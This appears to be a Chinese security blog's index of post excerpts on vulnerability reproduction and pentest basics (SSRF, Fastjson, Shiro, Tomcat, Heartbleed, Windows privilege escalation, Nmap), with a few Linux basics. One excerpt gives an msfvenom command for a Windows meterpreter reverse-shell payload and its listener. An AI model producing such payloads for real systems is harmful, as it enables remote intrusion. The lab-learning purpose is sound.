摘要:
SSRF漏洞 SSRF(Server-Site Request Forery)服务端请求伪造 形成原因 服务端提供了从其他服务器获取数据的功能,但没有对内网目标地址做过滤和限制。 容易出现的地方:将url请求作为参数请求资源时发生,分享、下载图片、从别的服务器请求资源等 主要利用方式 1.对外网、服 阅读全文
摘要:
jquery安全相关 https://cloud.tencent.com/developer/article/1516331 查看jquery版本方法 在网页源码中查看 console打印$.fn.jquery console打印 jquery低版本xss漏洞 漏洞复现工具 https://gith 阅读全文
摘要:
Fastjson1.2.24 RCE漏洞复现 环境搭建 vulhub docker搭建 docker-compose up -d 部署在kali的8090端口 java jdk版本 漏洞利用需要jdk8,而kali自带的jdk是jdk11 先卸载kali的jdk dpkg --list | grep 阅读全文
摘要:
HTTPS加密(SSL) 基本原理 1.客户端向服务端发送https请求,即输入网址后,链接到服务器的443端口 2.在服务端(如果采用https协议的话)就必须要有一套数字证书,这个证书其实就是一对公钥和私钥。 3.客户端请求完后,服务端会向客户端发送一个证书,也就是一个公钥,这里称作公钥A,里面 阅读全文
摘要:
open-SSL心脏滴血漏洞 在客户端和服务端建立了TLS加密连接状态后,需要隔一段时间来发送心跳数据包来确保对端是否在线 具体做法是客户端发送Client Hello 数据包,服务端返回Server Hello数据包 在client hello 数据包中有个字段length询问字符长度,当leng 阅读全文
摘要:
TOMCAT CVE-2017-12165复现 漏洞原理 在tomcat的配置文件web-xml中,有一项参数叫readonly 默认为true ,如果被改成了false 则允许了http的DELETE 和 PUT 方法, 导致可以上传jsp执行任意代码 环境搭建 用docker + vulhub搭 阅读全文
摘要:
Springboot框架actuator配置不当修复方案及验证详细 1.判断是否使用了Springboot框架 方法一: 查看网页图标 如果是类似SpringBoot框架的默认图标 这样的图标则大概率是使用了该框架 方法二:在方法一如果不能完全确定时,可以在网页路径在输入错误路径导致网页报错 查看网 阅读全文
摘要:
Shiro1.2.4RememberMe反序列化漏洞 针对Shiro版本1.2.4以下有效,Shiro是一个java框架 漏洞原理 Apache Shiro 有记住密码的功能,在登录成功后会生成字段setcookie 而这个cookie值是经过序列化 AES加密 base64编码得到 而在Shiro 阅读全文
摘要:
windows提权 信息收集 收集内容包括:操作系统信息、补丁情况、安装软件的情况、安装防护软件情况、端口开放情况 systeminfo hostname //主机名 set //环境变量 net user //用户 tasklist /svc //查看服务和pid /svc查看进程中的服务 net 阅读全文
摘要:
metasploit 木马生成与监听 msfvenom -p windows/meterpreter/reverse_tcp -lhost=192.168.1.1 lport=4444 -f exe -o /tmp/shell.exe //生成windows下的木马文件 use exploit/mu 阅读全文
摘要:
scapy模块 scapy是python的一个模块,kali里面已经集成,直接命令行就可以调用 它的主要功能是用来构造各种协议的数据包 在scapy里面有个协议就是一个类,如 ip=IP(src="src ip ",dst="dst ip") //构造一个ip数据包 ether=Ether(dst= 阅读全文
摘要:
Nmap端口扫描 主机发现 原理:和ping相似,发送检测包到目的主机,如果收到回复则说明主机存活 默认情况下nmap主机发送会发送以下四种类型的探测包: ICMP echo request TCP 去目标主机80端口的SYN包 TCP 去目标主机80端口的ACK包 一个CIMP时间戳请求 主机发现 阅读全文
摘要:
ms09-012漏洞 物理机 :自己电脑 靶机:VM win server 2003 ip地址 192.168.198.148 利用漏洞 ms09-012 溢出漏洞 环境搭建 在靶机server 2003 上面要安装IIS6.0 以及.net 1.1.4322 总体思路:在web漏洞上传木马后,获取 阅读全文
摘要:
kerberos协议与票据 windows用户密码存储在SAM文件(安全用户管理)中 当我们登录系统时,会对我们的密码进行hash加密后与数据库中密码对比、 (SAM文件保留了计算机本地所有用户的凭证信息) NTLM(NT Lan Manager)协议 早期SMB协议在网络上传输明文口令。后来出现 阅读全文
摘要:
Linux 磁盘分区相关 磁盘分区的作用 1.让数据更加安全,对一个分区的数据进行重整时不会影响到另外分区的数据 2.提高性能,分区后数据集中在磁盘的柱面上,搜索时数据更加集中,提高读取速度 磁盘可以分成主分区、拓展分区、逻辑分区(在拓展分区上划分) (一块磁盘最多四个主分区,或者三个主分区加一个拓 阅读全文
摘要:
Linux下的压缩与解压 gzip gzip压缩 : gzip -filename (压缩后源文件删除) gzip解压 :gunzip 或者 gzip -d bzip2 bzip2压缩:bzip2 -filename (压缩后也删除源文件) bzip2解压:bzip2 -d zip 与gzip相比, 阅读全文